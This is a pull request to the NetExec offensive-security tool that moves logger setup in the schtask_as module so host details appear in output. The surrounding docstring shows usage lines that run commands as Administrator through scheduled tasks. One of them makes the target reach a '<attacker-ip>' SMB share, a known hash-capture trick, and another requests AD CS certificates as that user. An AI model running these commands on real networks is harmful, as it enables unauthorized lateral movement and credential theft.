### PR TITLE
Fix logging output of schtask_as

### DIFF
--- a/nxc/modules/schtask_as.py
+++ b/nxc/modules/schtask_as.py
@@ -44,7 +44,6 @@ class NXCModule:
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD='dir \\<attacker-ip>\pwn' TASK='Legit Task' SILENTCOMMAND='True'
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD=certreq CA='ADCS\whiteflag-ADCS-CA' TEMPLATE=User
         """
-        self.logger = context.log
         self.command_to_run = self.binary_to_upload = self.run_task_as = self.task_name = self.output_filename = self.output_file_location = self.time = self.ca_name = self.template_name = None
         self.share = "C$"
         self.output_file_location = "\\Windows\\Temp"
@@ -71,6 +70,7 @@ class NXCModule:
         self.template_name = module_options.get("TEMPLATE")
 
     def on_admin_login(self, context, connection):
+        self.logger = context.log
 
         if self.command_to_run is None:
             self.logger.fail("You need to specify a CMD to run")


### PR DESCRIPTION
## Description
The `self.logger` was wrongfully set in the module_options where we don't (yet) have context information such as IP, port, hostname etc. This fixes the output such that these information are properly displayed.

## Type of change
Insert an "x" inside the brackets for relevant items (do not delete options)

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
- [ ] This PR was created with the assistance of AI (list what type of assistance, tool(s)/model(s) in the description)

## Setup guide for the review
Execute the module

## Screenshots (if appropriate):
Before&After:
<img width="1481" height="321" alt="image" src="https://github.com/user-attachments/assets/19906d8d-cfdc-420e-9411-4a987ca5d89e" />

## Checklist:

